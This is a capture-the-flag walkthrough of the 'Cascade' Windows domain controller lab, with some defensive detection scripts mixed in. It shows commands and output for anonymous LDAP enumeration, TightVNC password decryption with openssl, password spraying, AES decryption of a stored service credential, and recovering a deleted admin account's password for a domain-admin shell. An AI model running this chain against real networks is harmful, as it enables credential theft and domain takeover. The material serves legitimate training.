Cascade is a medium Windows machine configured as a Domain Controller. LDAP anonymous binds are enabled, and enumeration yields the password for user r.thompson, which gives access to a TightVNC registry backup. The backup is decrypted to gain the password for s.smith. This user has access to a .NET executable, which after decompilation and source code analysis reveals the password for the ArkSvc account. This account belongs to the AD Recycle Bin group, and is able to view deleted Active Directory objects. One of the deleted user accounts is found to contain a hardcoded password, which can be reused to login as the primary domain administrator.

Initial Nmap

```
PORT      STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-05 15:34:05Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
```

LDAP

Checking if Anonymous LDAP binding is enabled.

```
$ ldapsearch -x -H ldap://10.10.10.182 -b "DC=cascade,DC=local" '(objectClass=person)'

<SNIP>
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 2
codePage: 0
countryCode: 0
badPasswordTime: 133856782280227955
lastLogoff: 0
lastLogon: 133856660661946343
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 133856660661946343
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: <SNIP>
<SNIP>
```

The anonymous bind works, and the entry for r.thompson carries a non-standard cascadeLegacyPwd attribute. Its value looks base64-encoded, so we can try decoding it.

```
$ echo <SNIP> | base64 -d
<SNIP>
```
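The finding above is a custom attribute holding a credential that any anonymous bind can read. The following script is an added example, not part of the original write-up: it parses an ldapsearch LDIF dump, skips the standard attributes whose names merely contain "pwd" (pwdLastSet, badPwdCount, ...), flags any remaining secret-looking attribute, and base64-decodes its value when it can. The LDIF sample is constructed; the DNs and the encoded value are placeholders, not the real ones.

```python
"""Audit an ldapsearch (LDIF) dump for attributes that look like stored
credentials, such as the custom cascadeLegacyPwd attribute on this box.
Added example, not part of the original write-up. The LDIF below is a
constructed sample: the DNs and the base64 value are placeholders."""
import base64
import binascii
import re

# Attribute names that suggest a stored secret.
SUSPICIOUS_NAME = re.compile(r"pwd|passw|secret|cred|legacy", re.IGNORECASE)
# Standard AD attributes that match the pattern but carry no secret.
KNOWN_BENIGN = {"pwdlastset", "badpwdcount", "badpasswordtime", "maxpwdage",
                "minpwdage", "minpwdlength", "pwdproperties", "pwdhistorylength"}

PLACEHOLDER_B64 = base64.b64encode(b"placeholder-not-real").decode()

# Constructed sample modelled on the page's ldapsearch output (DNs invented).
SAMPLE_LDIF = f"""\
dn: CN=Ryan Thompson,CN=Users,DC=cascade,DC=local
objectClass: person
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
pwdLastSet: 132230718862636251
badPwdCount: 2
sAMAccountName: r.thompson
userPrincipalName: r.thompson@cascade.local
cascadeLegacyPwd: {PLACEHOLDER_B64}

dn: CN=s.smith,CN=Users,DC=cascade,DC=local
objectClass: person
sAMAccountName: s.smith
description: Help desk
"""


def parse_ldif(text):
    """Return a list of (dn, {attr: [values]}). '::' values are base64-decoded
    to bytes, plain ':' values stay str, and folded lines are joined."""
    entries, attrs, dn = [], {}, None
    unfolded = re.sub(r"\r?\n ", "", text)
    for line in unfolded.splitlines() + [""]:
        if not line.strip():
            if dn is not None:
                entries.append((dn, attrs))
            attrs, dn = {}, None
            continue
        if line.startswith("#"):
            continue
        name, _, value = line.partition(":")
        if value.startswith(":"):
            value = base64.b64decode(value[1:].strip())
        else:
            value = value.strip()
        if name == "dn":
            dn = value
        else:
            attrs.setdefault(name, []).append(value)
    return entries


def decode_if_base64(value):
    """Return decoded printable text if value is valid base64 text, else None."""
    if not isinstance(value, str) or len(value) % 4 or len(value) < 8:
        return None
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def audit_ldif(text):
    """List entries exposing secret-looking attributes, decoding base64 where possible."""
    findings = []
    for dn, attrs in parse_ldif(text):
        for name, values in attrs.items():
            if name.lower() in KNOWN_BENIGN or not SUSPICIOUS_NAME.search(name):
                continue
            for value in values:
                findings.append({"dn": dn, "attribute": name, "value": value,
                                 "decoded": decode_if_base64(value)})
    return findings


if __name__ == "__main__":
    for f in audit_ldif(SAMPLE_LDIF):
        print(f'{f["dn"]}: {f["attribute"]} = {(f["decoded"] or f["value"])!r}')
```

Run against a real dump, the same `audit_ldif` call lists every object that carries such an attribute, which is the list to clean up before disabling anonymous binds on the DC.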

SMB

We can try r.thompson and the password we have to see what shares are available.

```
$ nxc smb 10.10.10.182 -u r.thompson -p <SNIP> --shares

SMB 10.10.10.182 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\r.thompson:<SNIP>
SMB 10.10.10.182 445 CASC-DC1 [*] Enumerated shares
SMB 10.10.10.182 445 CASC-DC1 Share Permissions Remark
SMB 10.10.10.182 445 CASC-DC1 ----- ----------- ------
SMB 10.10.10.182 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.10.10.182 445 CASC-DC1 Audit$
SMB 10.10.10.182 445 CASC-DC1 C$ Default share
SMB 10.10.10.182 445 CASC-DC1 Data READ
SMB 10.10.10.182 445 CASC-DC1 IPC$ Remote IPC
SMB 10.10.10.182 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.10.10.182 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.10.10.182 445 CASC-DC1 SYSVOL READ Logon server share
```

Switching tools, we use smbmap to list the Data share recursively and see what it contains.

```
$ smbmap -H 10.10.10.182 -u r.thompson -p <SNIP> -R Data
[+] IP: 10.10.10.182:445 Name: casc-dc1
Disk Permissions Comment
---- ----------- -------
Data READ ONLY
.\Data\*
dr--r--r-- 0 Tue Jan 28 16:05:51 2020 .
dr--r--r-- 0 Tue Jan 28 16:05:51 2020 ..
dr--r--r-- 0 Sun Jan 12 19:45:14 2020 Contractors
dr--r--r-- 0 Sun Jan 12 19:45:10 2020 Finance
dr--r--r-- 0 Tue Jan 28 12:04:51 2020 IT
dr--r--r-- 0 Sun Jan 12 19:45:20 2020 Production
dr--r--r-- 0 Sun Jan 12 19:45:16 2020 Temps
.\Data\IT\*
dr--r--r-- 0 Tue Jan 28 12:04:51 2020 .
dr--r--r-- 0 Tue Jan 28 12:04:51 2020 ..
dr--r--r-- 0 Tue Jan 28 12:00:30 2020 Email Archives
dr--r--r-- 0 Tue Jan 28 12:04:51 2020 LogonAudit
dr--r--r-- 0 Tue Jan 28 18:53:04 2020 Logs
dr--r--r-- 0 Tue Jan 28 16:06:59 2020 Temp
.\Data\IT\Email Archives\*
dr--r--r-- 0 Tue Jan 28 12:00:30 2020 .
dr--r--r-- 0 Tue Jan 28 12:00:30 2020 ..
fr--r--r-- 2522 Tue Jan 28 12:00:30 2020 Meeting_Notes_June_2018.html
.\Data\IT\Logs\*
dr--r--r-- 0 Tue Jan 28 18:53:04 2020 .
dr--r--r-- 0 Tue Jan 28 18:53:04 2020 ..
dr--r--r-- 0 Tue Jan 28 18:53:04 2020 Ark AD Recycle Bin
dr--r--r-- 0 Tue Jan 28 18:56:00 2020 DCs
.\Data\IT\Logs\Ark AD Recycle Bin\*
dr--r--r-- 0 Tue Jan 28 18:53:04 2020 .
dr--r--r-- 0 Tue Jan 28 18:53:04 2020 ..
fr--r--r-- 1303 Tue Jan 28 19:19:11 2020 ArkAdRecycleBin.log
.\Data\IT\Logs\DCs\*
dr--r--r-- 0 Tue Jan 28 18:56:00 2020 .
dr--r--r-- 0 Tue Jan 28 18:56:00 2020 ..
fr--r--r-- 5967 Sun Jan 26 16:22:05 2020 dcdiag.log
.\Data\IT\Temp\*
dr--r--r-- 0 Tue Jan 28 16:06:59 2020 .
dr--r--r-- 0 Tue Jan 28 16:06:59 2020 ..
dr--r--r-- 0 Tue Jan 28 16:06:55 2020 r.thompson
dr--r--r-- 0 Tue Jan 28 14:00:05 2020 s.smith
.\Data\IT\Temp\s.smith\*
dr--r--r-- 0 Tue Jan 28 14:00:05 2020 .
dr--r--r-- 0 Tue Jan 28 14:00:05 2020 ..
fr--r--r-- 2680 Tue Jan 28 14:00:01 2020 VNC Install.reg
```

VNC Registry File

VNC Install.reg was the only file that held data we could really use. After downloading and opening it, we see a hex-encoded password for TightVNC.

TightVNC stores this password DES-encrypted under a fixed, publicly known key, so a registry backup containing it is effectively a cleartext credential. Using a little trick I found on GitHub for VNCDecrypt, I can decrypt this hex password.

```
$ echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
00000000 73 54 33 33 33 76 65 32 |<SNIP>|
00000008
```
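From the defender's side, the lesson is that a VNC server's registry export is a credential file. The script below is an added example, not from the write-up: it parses the .reg export format (key headers, `dword:` and `hex:` values, backslash continuation lines) and reports every non-empty password blob stored under a VNC key, so backups and file shares can be swept for them. The sample export is constructed; the TightVNC key path and value names are assumed from TightVNC's usual layout, and only the eight "Password" bytes come from the write-up.

```python
"""Parse a Windows .reg export and flag stored VNC password blobs.
Added example, not from the write-up. TightVNC keeps its password
DES-encrypted under a fixed, publicly known key, so any such blob found in a
backup must be treated as a cleartext credential and rotated."""
import re

# Constructed sample modelled on a TightVNC server export. Only the
# "Password" bytes come from the write-up; the rest are placeholders.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"UseVncAuthentication"=dword:00000001
"Password"=hex:6b,cf,2a,4b,\
  6e,5a,ca,0f
"ControlPassword"=hex:00,00,00,00,00,00,00,00
'''

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<val>.*)$')


def _parse_value(raw):
    """Decode the three .reg value syntaxes this checker cares about."""
    if raw.startswith('"') and raw.endswith('"'):
        return "string", raw[1:-1]
    if raw.startswith("dword:"):
        return "dword", int(raw[len("dword:"):], 16)
    if raw.startswith("hex:"):
        return "hex", bytes.fromhex(raw[len("hex:"):].replace(",", ""))
    return "raw", raw


def parse_reg(text):
    """Return {key_path: {value_name: (type, value)}}.
    A trailing backslash continues a hex value on the next (indented) line."""
    joined = re.sub(r"\\\r?\n\s*", "", text)
    result, current = {}, None
    for line in joined.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            result.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            result[current][m.group("name")] = _parse_value(m.group("val"))
    return result


def find_vnc_passwords(reg):
    """(key, value name, hex) for every non-zero password blob under a VNC key."""
    hits = []
    for key, values in reg.items():
        if "vnc" not in key.lower():
            continue
        for name, (vtype, val) in values.items():
            # An all-zero blob means the password was never set; skip it.
            if vtype == "hex" and name.lower().endswith("password") and any(val):
                hits.append((key, name, val.hex()))
    return hits


if __name__ == "__main__":
    for key, name, blob in find_vnc_passwords(parse_reg(SAMPLE_REG)):
        print(f"{key}\\{name}: {blob}  <- fixed-key DES, treat as cleartext; rotate")
```

The checker deliberately does not decrypt anything: knowing that a blob exists is enough to trigger a rotation, and the stored value should never have been on a readable share in the first place.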

Password Spraying

After getting this password, we try spraying it across the domain's user list and get a successful login.

```
$ nxc smb 10.10.10.182 -u users.lst -p <SNIP>
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\CascGuest:<SNIP> STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\arksvc:<SNIP> STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\s.smith:<SNIP>
```

We got a hit on s.smith, so we can see what else they might have access to via SMB.
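A spray like the one above leaves a distinctive trail on the domain controller: one source address, several different accounts failing within seconds, then a success. The following detection is an added example, not part of the write-up, run over constructed logon events (EventID 4625 failures and 4624 successes, with placeholder source IPs that are not the box's or the attacker's). It raises one alert per source that fails against at least `min_accounts` distinct accounts inside a time window and lists which accounts then logged on successfully from that source.

```python
"""Flag password-spray patterns in domain-controller logon events: one
source address producing failed logons (EventID 4625) against many distinct
accounts in a short window, optionally followed by a success (4624) for one
of them. Added example, not from the write-up. The events are constructed;
the source IPs are placeholders, not the box's or the attacker's."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events modelled on the spray shown above: three accounts fail
# from one host in seconds, then s.smith succeeds from the same host. The
# second host is a single user mistyping their own password, not a spray.
SAMPLE_EVENTS = [
    {"time": "2025-03-05T15:40:01", "id": 4625, "user": "CascGuest", "ip": "10.0.0.99"},
    {"time": "2025-03-05T15:40:02", "id": 4625, "user": "arksvc", "ip": "10.0.0.99"},
    {"time": "2025-03-05T15:40:03", "id": 4625, "user": "r.thompson", "ip": "10.0.0.99"},
    {"time": "2025-03-05T15:40:04", "id": 4624, "user": "s.smith", "ip": "10.0.0.99"},
    {"time": "2025-03-05T15:41:00", "id": 4625, "user": "s.smith", "ip": "10.0.0.50"},
    {"time": "2025-03-05T15:41:05", "id": 4625, "user": "s.smith", "ip": "10.0.0.50"},
    {"time": "2025-03-05T15:41:09", "id": 4624, "user": "s.smith", "ip": "10.0.0.50"},
]


def detect_spray(events, window=timedelta(minutes=5), min_accounts=3):
    """Return one alert per source IP whose 4625 failures inside `window`
    touch at least `min_accounts` distinct accounts. Each alert lists the
    sprayed accounts and any account that then logged on successfully from
    that IP, which is the credential a responder should reset first."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append({**e, "time": datetime.fromisoformat(e["time"])})
    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        failures = [e for e in evs if e["id"] == 4625]
        for i, start in enumerate(failures):
            in_window = [e for e in failures[i:] if e["time"] - start["time"] <= window]
            accounts = {e["user"] for e in in_window}
            if len(accounts) < min_accounts:
                continue
            end = in_window[-1]["time"] + window
            successes = {e["user"] for e in evs
                         if e["id"] == 4624 and start["time"] <= e["time"] <= end}
            alerts.append({"ip": ip, "first_seen": start["time"].isoformat(),
                           "accounts": sorted(accounts), "successes": sorted(successes)})
            break  # one alert per source is enough for triage
    return alerts


if __name__ == "__main__":
    for a in detect_spray(SAMPLE_EVENTS):
        print(f'{a["ip"]} sprayed {len(a["accounts"])} accounts from {a["first_seen"]}; '
              f'successful logons: {a["successes"] or "none"}')
```

The default of three accounts is set low so the sample fires; in production the threshold and window are tuned to the environment, and the same logic works on 4771/4776 pre-authentication failures for sprays that go over Kerberos or NTLM rather than SMB.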

SMasHing SMB with s.smith

Listing the shares again, we see s.smith has read access to the Audit$ share.

```
$ smbmap -H 10.10.10.182 -u s.smith -p <SNIP>
[+] IP: 10.10.10.182:445 Name: casc-dc1
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ READ ONLY
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
```

Listing this share shows a handful of files, including what looks like a custom executable.

```
$ smbmap -H 10.10.10.182 -u s.smith -p <SNIP> -R 'Audit$'
[+] IP: 10.10.10.182:445 Name: casc-dc1
Disk Permissions Comment
---- ----------- -------
Audit$ READ ONLY
.\Audit$\*
dr--r--r-- 0 Wed Jan 29 12:01:26 2020 .
dr--r--r-- 0 Wed Jan 29 12:01:26 2020 ..
fr--r--r-- 13312 Tue Jan 28 15:47:08 2020 CascAudit.exe
fr--r--r-- 12288 Wed Jan 29 12:01:26 2020 CascCrypto.dll
dr--r--r-- 0 Tue Jan 28 15:43:18 2020 DB
fr--r--r-- 45 Tue Jan 28 17:29:47 2020 RunAudit.bat
fr--r--r-- 363520 Tue Jan 28 14:42:18 2020 System.Data.SQLite.dll
fr--r--r-- 186880 Tue Jan 28 14:42:18 2020 System.Data.SQLite.EF6.dll
dr--r--r-- 0 Tue Jan 28 14:42:18 2020 x64
dr--r--r-- 0 Tue Jan 28 14:42:18 2020 x86
.\Audit$\DB\*
dr--r--r-- 0 Tue Jan 28 15:43:18 2020 .
dr--r--r-- 0 Tue Jan 28 15:43:18 2020 ..
fr--r--r-- 24576 Tue Jan 28 15:43:18 2020 Audit.db
.\Audit$\x64\*
dr--r--r-- 0 Tue Jan 28 14:42:18 2020 .
dr--r--r-- 0 Tue Jan 28 14:42:18 2020 ..
fr--r--r-- 1639936 Tue Jan 28 14:42:18 2020 SQLite.Interop.dll
.\Audit$\x86\*
dr--r--r-- 0 Tue Jan 28 14:42:18 2020 .
dr--r--r-- 0 Tue Jan 28 14:42:18 2020 ..
fr--r--r-- 1246720 Tue Jan 28 14:42:18 2020 SQLite.Interop.dll
```

Source Code Analysis

We can download CascAudit.exe and see what it does. We copy it to our Windows VM, open it in dnSpy, and look at the MainModule.

This shows us a part of the executable that uses SQLite to create an account over LDAP, I suppose, as well as a call to a Crypto function that isn't defined anywhere in the executable. So it must live in a DLL on the share; we'll go back to the Audit$ share for more. We can grab CascCrypto.dll and Audit.db and check these out.

```
# Audit.db

$ sqlite3 10.10.10.182-Audit_DB_Audit.db '.dump'
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE IF NOT EXISTS "Ldap" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"uname" TEXT,
"pwd" TEXT,
"domain" TEXT
);
INSERT INTO Ldap VALUES(1,'ArkSvc','<BASE64>','cascade.local');
CREATE TABLE IF NOT EXISTS "Misc" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
<SNIP>
```

So we have a base64-encoded, encrypted password for the user ArkSvc. Next we look at the DLL we grabbed, back in dnSpy.
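An application database that keeps a service account's password next to the binary holding the key is a common pattern worth hunting for on file shares. The script below is an added example, not from the write-up: it rebuilds the Ldap and Misc tables from the dump above in an in-memory SQLite database (with a constructed placeholder instead of the real value) and then, using only the standard library, walks every user table of a database, reports columns whose names look like credentials, and counts how many of their values are base64-looking rather than plain text. The scanner part works unchanged on any .db file opened with `sqlite3.connect`.

```python
"""Inventory credential-like columns in a SQLite file, the way Audit.db on
the Audit$ share keeps an 'Ldap' table with a 'pwd' column. Added example,
not from the write-up; the database is built in memory from the schema in
the dump above, with a constructed placeholder instead of the real value."""
import base64
import re
import sqlite3

# Column names that usually hold a secret.
CRED_COLUMN = re.compile(r"pwd|pass|secret|token", re.IGNORECASE)


def build_sample_db():
    """Recreate the Ldap table from the page's dump; the pwd value is a placeholder."""
    conn = sqlite3.connect(":memory:")
    conn.executescript('''
        CREATE TABLE IF NOT EXISTS "Ldap" (
            "Id" INTEGER PRIMARY KEY AUTOINCREMENT,
            "uname" TEXT, "pwd" TEXT, "domain" TEXT);
        CREATE TABLE IF NOT EXISTS "Misc" (
            "Id" INTEGER PRIMARY KEY AUTOINCREMENT);
    ''')
    placeholder = base64.b64encode(b"constructed-ciphertext-placeholder").decode()
    conn.execute("INSERT INTO Ldap VALUES (1, 'ArkSvc', ?, 'cascade.local')", (placeholder,))
    conn.commit()
    return conn


def looks_base64(value):
    """True for text that is valid base64, i.e. encoded or encrypted rather than plain."""
    return (isinstance(value, str) and len(value) % 4 == 0
            and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value) is not None)


def scan_credential_columns(conn):
    """Return [(table, column, non-null rows, base64-looking rows)] for every
    column whose name matches CRED_COLUMN, across all user tables."""
    findings = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        columns = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')]
        for col in columns:
            if not CRED_COLUMN.search(col):
                continue
            rows = conn.execute(
                f'SELECT "{col}" FROM "{table}" WHERE "{col}" IS NOT NULL').fetchall()
            encoded = sum(1 for (v,) in rows if looks_base64(v))
            findings.append((table, col, len(rows), encoded))
    return findings


if __name__ == "__main__":
    for table, col, rows, encoded in scan_credential_columns(build_sample_db()):
        print(f"{table}.{col}: {rows} row(s), {encoded} base64-looking; "
              "a key shipped beside this file makes it cleartext")
```

An encoded value is not a safe value: when the key and IV sit in a binary on the same share, the ciphertext is equivalent to cleartext, and the remediation is to move the secret out of the database (for example into a managed service account or a vault) rather than to encrypt it harder.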

The DLL contains the Crypto function, and looking it over we see it uses AES. Doing some research and noting the cipher mode, CBC, as set in the DLL code (aes.Mode = CipherMode.CBC;), we first need to install pyaes (apt install python-pyaes). Then, with the key and IV values recovered from the decompiled code, we use Python to decrypt the password we have from the SQLite database.

```
$ python3
Python 3.11.2 (main, Nov 30 2024, 21:22:50) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pyaes
>>> from base64 import b64decode
>>> key = b'KEY'
>>> iv = b'IV'
>>> aes = pyaes.AESModeOfOperationCBC(key, iv = iv)
>>> decrypted = aes.decrypt(b64decode('<BASE64>'))
>>> print(decrypted.decode())
<SNIP>
>>>
```

We got the password for arksvc. We can check our access with nxc.

```
$ nxc winrm 10.10.10.182 -u arksvc -p <SNIP>
WINRM 10.10.10.182 5985 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 (name:CASC-DC1) (domain:cascade.local)
WINRM 10.10.10.182 5985 CASC-DC1 [+] cascade.local\arksvc:<SNIP> (Pwn3d!)
```

Let's get a shell and snoop around.

Shell as arksvc

```
$ evil-winrm -i 10.10.10.182 -u arksvc -p <SNIP>
<SNIP>

*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name Type SID Attributes
=========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\AD Recycle Bin Alias S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
```

We see we are in the AD Recycle Bin group, and looking online we find a GitHub page stating that this group has permission to read deleted AD objects. We can check whether anything has been deleted.

PrivEsc

```
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
<SNIP>
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : <BASE64>
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
<SNIP>
```

The deleted TempAdmin object carries another cascadeLegacyPwd attribute, which we can decode the same way.

```
$ echo <BASE64> | base64 -d
<SNIP>
```

Since this belonged to TempAdmin, we try the Administrator account with the same password.

```
$ evil-winrm -i 10.10.10.182 -u Administrator -p <SNIP>

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami;hostname
cascade\administrator
CASC-DC1
```